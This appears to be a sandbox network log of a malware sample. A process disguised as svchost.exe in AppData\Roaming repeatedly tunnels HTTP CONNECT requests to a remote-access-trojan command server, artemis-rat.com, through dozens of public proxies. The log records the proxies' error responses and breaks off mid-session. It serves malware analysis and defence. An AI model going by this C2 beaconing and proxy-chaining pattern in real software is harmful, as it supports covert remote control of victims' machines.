Mar 9, 2024 13:14:31.812289953 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3661 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:58378 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2733	192.168.2.5	58871	46.35.9.110	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.596340895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2734	192.168.2.5	58340	50.63.12.33	23859	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.614052057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.442589045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2735	192.168.2.5	58999	129.213.150.205	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.615740061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2736	192.168.2.5	58873	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.615977049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2737	192.168.2.5	58861	43.133.70.57	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.618120909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2738	192.168.2.5	59048	104.18.251.208	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.619604111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.774039984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2739	192.168.2.5	58904	121.164.200.18	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.621335030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2740	192.168.2.5	58860	120.78.191.68	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.630693913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.971091032 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Mar 9, 2024 13:14:31.971983910 CET	318	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2741	192.168.2.5	58348	185.158.114.14	25697	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.650211096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2742	192.168.2.5	58089	117.160.250.134	8899	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.651828051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.336566925 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2743	192.168.2.5	57603	163.172.144.132	16379	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.656887054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.645860910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646497011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2744	192.168.2.5	58092	92.204.135.37	32524	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.659749985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974045038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2745	192.168.2.5	56273	107.180.88.173	35774	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.660089970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.770544052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846472979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2746	192.168.2.5	58302	107.180.103.214	61634	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.660449028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.645890951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646514893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2747	192.168.2.5	58910	51.15.247.93	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.688932896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2748	192.168.2.5	58899	14.103.24.20	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.689007998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2749	192.168.2.5	56292	181.78.19.247	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.690515041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.473684072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2750	192.168.2.5	58892	138.121.161.86	8190	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.690797091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.442529917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.443041086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.443012953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2751	192.168.2.5	58128	94.23.220.136	59415	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.690798044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.442817926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2752	192.168.2.5	58952	93.190.142.57	31280	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.691787958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.984617949 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2753	192.168.2.5	58893	221.6.139.190	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.695086956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.052977085 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2754	192.168.2.5	58960	188.166.17.18	8881	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
